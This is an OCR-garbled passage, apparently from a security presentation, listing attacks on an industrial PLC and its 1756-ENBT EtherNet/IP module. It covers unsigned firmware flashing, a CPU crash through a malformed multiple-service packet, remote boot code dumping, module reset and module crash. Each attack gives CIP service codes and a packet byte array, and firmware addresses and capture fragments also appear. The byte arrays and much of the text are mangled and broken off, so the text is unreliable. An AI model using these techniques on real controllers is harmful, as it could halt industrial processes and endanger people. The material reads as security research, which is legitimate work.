25. stance xi12a54c ei ProcessGetAttrSingleInstance 0x120f24 ci ParseSegment Ox12123c ci ParseSegment Ox13c7c4 gs LogEvent Ox13c970 gs LogEvent 0x108470 GS LogAppEventData 0x108480 GS LogAppEventData 0x144024 LogCrashEventData 0x144110 LogCrashEventData 0x2903c0 taskSpawn 0x290438 taskSpawn 0x290b44 taskActivate 0 2259054 taskActivate 0x2916b8 taskResume 13 Attack 7 Flash Update Impact Initialize the device to update the firmware CIP Unconnected send Service Ox4b NV UPDATE vendor specific name extracted from firmware Class 1 Non Volatile Object vendor specific name extracted from firmware After issuing this service we would load our own firmware via the service code Ox4d nv Transfer unsigned char packetFlashUp WAROO 200 2001200 NKS NKI NK xo0 x00x00 x00 NKO 5652 1800 KLE NN XxaAb Vx Z e20 seal e24 x01 e05 x99 207 Vx0 Vx41T 1 02 x204x274x24X4xc8 UN 00 VxK00 x01 x00 x01 x00 Unknown Service 38 CIP 110 success 33 CIP 454 Unknown Service 0x4d 38 CIP 104 Success 57 CIP 454 unknown Service 0x4d 38 CIP 104 success 338611 49 72 393044 192 168 50 72 407977 192 168 51 72 410210 192 168 52 72 413795 192 168 53 2 416071 192 168 33 192 168 38 192 168 133 192 168 38 192 168 243 192 168 s b 17 1 1 1 1 1 1 1 1 1 1 54 72 418060 192 168 1 38 192 168 1 33 CIP 454 unknown Serv
26. x00 x00 x02 x00 x02 x00 x00 x00 x00 x00 xb2 x00 xla x00 HAS RA x 2 x20 x06 x24 ee x Z EO NNN YOM OS NE NON ANE AXDEXXADVAXBEXXEFXXCAVXEEVXOIlXXOOXxOlVXxXQOQ Attack 43 Crash CPU Impact Crashes the CPU due to a malformed request leaving it in a Major recoverable fault state In order to clear the fault the key needs to be turned manually from RUN to PROG twice CIP Unconnected send CM via 0x52 Service Oxa Multipel service packet Class 0x2 Message Router unsigned char packetCrashCPU AxOOXVxOOXxODXVXxOOVxOZXAxOOXxOZXVxOOXxXO0XxO0VxODXxODXxXbZXxOO0XxlaXx00 RS NUNAN x01 x02 NNN NN NA NN VxZzOVEDZAXZA x01 xf4 xf0 x09 x09 x88 x04 x01 x00 x01 x00 Attack 4 Dump 1756 ENBT s module boot code Impact A curious undocumented service that allows remotely dumping of the EtherNET IP module s boot code CIP Unconnected send Service 0x97 IJ 11055 0 unsigned packetDump 00 300 2001200 x NKUL Vx Z x00 x00Xx00 x00 x00 ab x00 x06 NN TN NNN 12 Attack 45 Reset 1756 ENBT module Impact Resets the EtherNET IP module CIP Unconnected send Service 0x5 RESET Lg Class 0x01 Identity Manager unsigned char packetResetEth XXUQ x00 x00 00 200 1304 X Z XxXO 71200 1200 x U x00 xb2 x00 x06 200 Wed 5 20 3 x20 x01 x24 x01x20 x02 7 Attack 6 Crash 1756 ENBT module Impact Crashes the module due to a vulnerability in the
Download Pdf Manuals
Related Search